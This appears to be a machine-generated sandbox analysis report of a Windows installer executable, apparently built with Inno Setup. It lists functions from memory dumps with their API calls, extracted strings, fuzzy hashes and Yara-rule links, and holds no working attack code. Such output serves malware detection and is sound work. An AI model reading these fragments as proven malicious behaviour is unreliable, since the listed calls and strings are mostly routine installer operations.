Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
API String ID: 854858120-615399546
Opcode ID: ee69967e6aaba8aeb6b2a1dafbe545f86160187bcdeeb3f8aa840c8774dff546
Instruction ID: 88e2853dccfaa7143611bf52dc62ae34b40875a7a0a12817af126c8a521733c8
Opcode Fuzzy Hash: ee69967e6aaba8aeb6b2a1dafbe545f86160187bcdeeb3f8aa840c8774dff546
Instruction Fuzzy Hash: 39516870A0020C9BDB10EFD6C982BDEB7B9BF59304F60417BB804B7291D7789E199B59

Uniqueness

Uniqueness Score: -1.00%

Function 004799B4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 126registryCOMMON

Download Yara Rule

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,00479B61,?,00000000,?,00479C05,00000000,?,0045E17B,00460448,?,00000000,0045E1F9), ref: 00479A0C
RegOpenKeyExW.ADVAPI32(80000002,00000000), ref: 00479A74
RegQueryValueExW.ADVAPI32(?,layout text,00000000,00000000,?,00000200,00000000,00479B1D,?,80000002,00000000), ref: 00479AAE
RegCloseKey.ADVAPI32(?,00479B24,00000000,?,00000200,00000000,00479B1D,?,80000002,00000000), ref: 00479B17

Strings

System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00479A5E
layout text, xrefs: 00479AA5

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-2652665750
Opcode ID: 978f114794eb79639c03d9d98b68e8d2b92300513cd4671528bf07f53b55e33a
Instruction ID: 840c971cceb15e7099a20cec3684e3c81698b4dbb0a39db1a36b2c17f7ae8159
Opcode Fuzzy Hash: 978f114794eb79639c03d9d98b68e8d2b92300513cd4671528bf07f53b55e33a
Instruction Fuzzy Hash: C0411874A002089FDB15DF55D982BDEB7F9FB48304F9184A6E908A7391D778AE00CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0048148C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowregistryCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 004814BB
GetFocus.USER32 ref: 004814C3
RegisterClassW.USER32 ref: 004814E4
ShowWindow.USER32(00000000,00000008,00000000,00400000,00000000,61736944,00000000,00000000,00000000,00000000,80000000,00000000,00400000,00000000,00000000,00000000), ref: 0048157C
SetFocus.USER32(00000000,00000000,0048159E,?,?,00000000,00000001,00000000,?,004B3357,?,00000000,00000000,004FE5AF,?,00000001), ref: 00481583

Strings

TWindowDisabler-Window, xrefs: 0048151B, 00481564

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FocusWindow$ActiveClassRegisterShow
String ID: TWindowDisabler-Window
API String ID: 495420250-1824977358
Opcode ID: 0474ad14fa7d31efc52ec4714ae1604c949dbaa4a40e5f31d4c84349d29e73d8
Instruction ID: 49d0bc2b81e5ad620ede4f7c9f028102b8841b21f60e8c55bafaaeb2fca67e8d
Opcode Fuzzy Hash: 0474ad14fa7d31efc52ec4714ae1604c949dbaa4a40e5f31d4c84349d29e73d8
Instruction Fuzzy Hash: EE21B170A407007BE710FF659C52F2E72E9EB84B04F11892BB500AB2E1D77CAD158799

Uniqueness

Uniqueness Score: -1.00%

Function 00500DF4, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00500EBE,?,00000000,00000000,00000000), ref: 00500E22

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00500EBE,?,00000000,00000000,00000000), ref: 00500E3C

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000), ref: 00409666

Strings

Wow64DisableWow64FsRedirection, xrefs: 00500E18
Wow64RevertWow64FsRedirection, xrefs: 00500E32
shell32.dll, xrefs: 00500E7F
kernel32.dll, xrefs: 00500E1D, 00500E37

Memory Dump Source

Source File: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: d14566759a9e3a9b79bb4b3fe3c6c0f3b8f10220c55e678fc80cbeb4824e1c44
Instruction ID: efa057ab5e05a15ff7e3b0b0ca10867553e833952fba2894543aa0bcd2786cba
Opcode Fuzzy Hash: d14566759a9e3a9b79bb4b3fe3c6c0f3b8f10220c55e678fc80cbeb4824e1c44
Instruction Fuzzy Hash: 5911A030604309AAEB10EB62DC42B5E7BA8FB04708F109C6AF400762D2DF799E49DA59

Uniqueness

Uniqueness Score: -1.00%

Function 004C9584, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 342COMMON

Download Yara Rule

Strings

Need to restart Windows? %s, xrefs: 004C9914
tCP, xrefs: 004C98FF
PrepareToInstall failed: %s, xrefs: 004C98EB
NextButtonClick, xrefs: 004C96CB

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s$tCP
API String ID: 0-3092316609
Opcode ID: f2ce6b014efed82364be85ffe067d0a1484561c621730e42a739189804a2a7c1
Instruction ID: a6ef2682e3d396527b324732c65ece05380923b168d01b68b090bb9358bebdc0
Opcode Fuzzy Hash: f2ce6b014efed82364be85ffe067d0a1484561c621730e42a739189804a2a7c1
Instruction Fuzzy Hash: A5E14178A00248EFCB40EB59D885FADB7F5FF45304F5544AAE400A7361C738AE05DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004E5EF8, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 233COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?,?,00000000,004E6265,?,?,?,?,00000003,00000000,00000000,?,004C9A35,?,00000007,00000000), ref: 004E602B
SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004E60CC

Strings

Need to restart Windows? %s, xrefs: 004E610B
, xrefs: 004E6180
tCP, xrefs: 004E60F6

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ActiveChangeNotifyWindow
String ID: $Need to restart Windows? %s$tCP
API String ID: 1160245247-4190991656
Opcode ID: fd02b283e6c70fc27a3ed48999abee8a4009c2cdc0d3eef5b40712689e68c920
Instruction ID: 0b520b351fe0d5d185f0ad943ba6c26b79dacf8f47c0b622d3570f5a38af64e6
Opcode Fuzzy Hash: fd02b283e6c70fc27a3ed48999abee8a4009c2cdc0d3eef5b40712689e68c920
Instruction Fuzzy Hash: 23A1A334600285CFDB11EF6AD895B9D77E0FF1A309F1141AAF5009B362CB78AC49DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004CE410, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 166COMMON

Download Yara Rule

Strings

;fM, xrefs: 004CE468
Creating directory: %s, xrefs: 004CE4D1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeNotify$ErrorLast
String ID: ;fM$Creating directory: %s
API String ID: 4282108553-3882219245
Opcode ID: 8bcf349af96e22b5bce2589b38b7b54f85c290749946f3e131abdbb0156d3ff5
Instruction ID: e5d44b910d2973f18947233fbebd5679fa9a75ae6e72ebe3fe14a401b2353986
Opcode Fuzzy Hash: 8bcf349af96e22b5bce2589b38b7b54f85c290749946f3e131abdbb0156d3ff5
Instruction Fuzzy Hash: 69516834A00208AFDB45EB96C982FDDB7F5AF48308F10416AF901B7392DB785E04DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004DE8AC, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,004DE9FE,?,0050B17C,00000005,00000000,00000000,?,004FE411,00000000,004FE5C9,?,00000000,004FE639), ref: 004DE937
GetLastError.KERNEL32(00000000,00000000,00000000,004DE9FE,?,0050B17C,00000005,00000000,00000000,?,004FE411,00000000,004FE5C9,?,00000000,004FE639), ref: 004DE940

Strings

_isetup, xrefs: 004DE922
Created temporary directory: , xrefs: 004DE8E9
\_setup64.tmp, xrefs: 004DE9B6

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID: Created temporary directory: $\_setup64.tmp$_isetup
API String ID: 1375471231-2952887711
Opcode ID: 9c2f40a32887d448f03f9f8e01d4962487fbd44746a265313fdec099bb0ef30b
Instruction ID: d615ad965eb37596d86b9359e25ae7b517ebc8272817c1d1977c1002efbd3dd7
Opcode Fuzzy Hash: 9c2f40a32887d448f03f9f8e01d4962487fbd44746a265313fdec099bb0ef30b
Instruction Fuzzy Hash: CB413774A001099BDB01FB96D892ADEB3B5EF44304F50417BF501B7395DB38AE05DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0050156C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 00408F4C: GetModuleHandleW.KERNEL32(00000000,?,0050157F), ref: 00408F58

GetWindowLongW.USER32(?,000000EC), ref: 0050158F
SetWindowLongW.USER32 ref: 005015A2
SetErrorMode.KERNEL32(00000001,00000000,005015E7,?,?,000000EC,00000000), ref: 005015B7

Part of subcall function 004FE938: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000,005015E7,?,?,000000EC,00000000), ref: 004FE942

Part of subcall function 0047C3E4: SendMessageW.USER32(?,0000B020,00000000,?), ref: 0047C409

Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF58

ShowWindow.USER32(?,00000005,00000000,005015E7,?,?,000000EC,00000000), ref: 00501621

Part of subcall function 0047C4DC: GetWindowLongW.USER32(?,000000EC), ref: 0047C5B8
Part of subcall function 0047C4DC: SetWindowLongW.USER32 ref: 0047C5C6

Strings

Setup, xrefs: 00501607

Memory Dump Source

Source File: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$HandleModule$ErrorMessageModeSendShowText
String ID: Setup
API String ID: 409482983-3839654196
Opcode ID: 5813d92d832c3a24bc5f91728c724cc08d1364cad99fd056d9369d2e3a652a44
Instruction ID: 85a335eca4af0587aa7e4792b47526a5508c6ab4af5c4621c7bb7e4a51b097de
Opcode Fuzzy Hash: 5813d92d832c3a24bc5f91728c724cc08d1364cad99fd056d9369d2e3a652a44
Instruction Fuzzy Hash: 14212A752006009FC311FF6ADC85D6A37E8FB4E715B050166F6058B7B2CA79AC04DF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0047B184, Relevance: 7.6, APIs: 5, Instructions: 107COMMON

Download Yara Rule

APIs

EnumWindows.USER32(0047B090,00000000), ref: 0047B1BB
ShowWindow.USER32(?,00000000,0047B090,00000000), ref: 0047B1F2
ShowOwnedPopups.USER32(00000000,?,0047B090,00000000), ref: 0047B221
ShowWindow.USER32(?,00000005), ref: 0047B289
ShowOwnedPopups.USER32(00000000,?), ref: 0047B2B8

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Show$OwnedPopupsWindow$EnumWindows
String ID:
API String ID: 315437064-0
Opcode ID: 5fb92d1e255e78b0e6220409a9dd40a2776ac86e4a0dfad0f9c38248dc4dec0b
Instruction ID: 3d4273c88af56619a79c768caf10b4b06718961b4f248b211a3b28a4cc5d4f15
Opcode Fuzzy Hash: 5fb92d1e255e78b0e6220409a9dd40a2776ac86e4a0dfad0f9c38248dc4dec0b
Instruction Fuzzy Hash: EC4192306016008FE7209B79C849FEA73E5EB41358F1589ABE56D972E3C73CAC85C789

Uniqueness

Uniqueness Score: -1.00%

Function 004788F8, Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000EC), ref: 0047892C
SetWindowLongW.USER32 ref: 0047895E
SetLayeredWindowAttributes.USER32(00000000,00000000,?,00000000,00000000,000000EC,?,?,00475C6B), ref: 0047899C
SetWindowLongW.USER32 ref: 004789B5
RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,00475C6B), ref: 004789CB

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesLayeredRedraw
String ID:
API String ID: 1758778077-0
Opcode ID: 38f946655069d2aa1ab86c44932aa06d58e9694477719161465c0c2d9a5b5af9
Instruction ID: 5edffc186236ca9cd662aa7780263bab535e46823a61d8d4c1d37994e57ed627
Opcode Fuzzy Hash: 38f946655069d2aa1ab86c44932aa06d58e9694477719161465c0c2d9a5b5af9
Instruction Fuzzy Hash: F311C8F090439026DB51AF795C89BAB368C0B01315F18097BB989FA2D3CA3CCE54D36D

Uniqueness

Uniqueness Score: -1.00%

Function 00405084, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004050B5
FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000,?,?,00000000,?,004FE94D,00000000), ref: 00405156
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000,?,?,00000000,?,004FE94D,00000000), ref: 00405192

Part of subcall function 00404FF4: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000), ref: 0040502D
Part of subcall function 00404FF4: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5,?,?,?,00000002,004051BA,00403127,0040316E,?), ref: 00405033
Part of subcall function 00404FF4: GetStdHandle.KERNEL32(000000F5,00405080,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5), ref: 00405048
Part of subcall function 00404FF4: WriteFile.KERNEL32(00000000,000000F5,00405080,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5), ref: 0040504E

Strings

P`P, xrefs: 0040508D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: P`P
API String ID: 3490077880-2641087985
Opcode ID: 28a99a7d279133977b670663e5dd43802ba0339314adbce1de80012b95f986b6
Instruction ID: f8076fa01862c25fbc21170c7190708f008f91801cbf2dac019033dfaeef2244
Opcode Fuzzy Hash: 28a99a7d279133977b670663e5dd43802ba0339314adbce1de80012b95f986b6
Instruction Fuzzy Hash: 79315C70A00B018BEB31AB79849871F76E4AB54314F15053FE546AB3D2DBBC9884CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040507C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004050B5
FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000,?,?,00000000,?,004FE94D,00000000), ref: 00405156
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000,?,?,00000000,?,004FE94D,00000000), ref: 00405192

Part of subcall function 00404FF4: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000), ref: 0040502D
Part of subcall function 00404FF4: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5,?,?,?,00000002,004051BA,00403127,0040316E,?), ref: 00405033
Part of subcall function 00404FF4: GetStdHandle.KERNEL32(000000F5,00405080,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5), ref: 00405048
Part of subcall function 00404FF4: WriteFile.KERNEL32(00000000,000000F5,00405080,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5), ref: 0040504E

Strings

P`P, xrefs: 0040508D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: P`P
API String ID: 3490077880-2641087985
Opcode ID: 87176a9685309a12c8be941d4347404ddaf9499c6375cc54f24d9575609221d3
Instruction ID: d8d4ff2e5ed23e97098172edb5ed3148643db9e8804edc61c44e2fb156439bae
Opcode Fuzzy Hash: 87176a9685309a12c8be941d4347404ddaf9499c6375cc54f24d9575609221d3
Instruction Fuzzy Hash: B6314E70A00B418BEB31AB75849871B7BE0AF55314F15053FE586AB3D2D77C9884CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405080, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004050B5
FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000,?,?,00000000,?,004FE94D,00000000), ref: 00405156
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000,?,?,00000000,?,004FE94D,00000000), ref: 00405192

Part of subcall function 00404FF4: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000), ref: 0040502D
Part of subcall function 00404FF4: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5,?,?,?,00000002,004051BA,00403127,0040316E,?), ref: 00405033
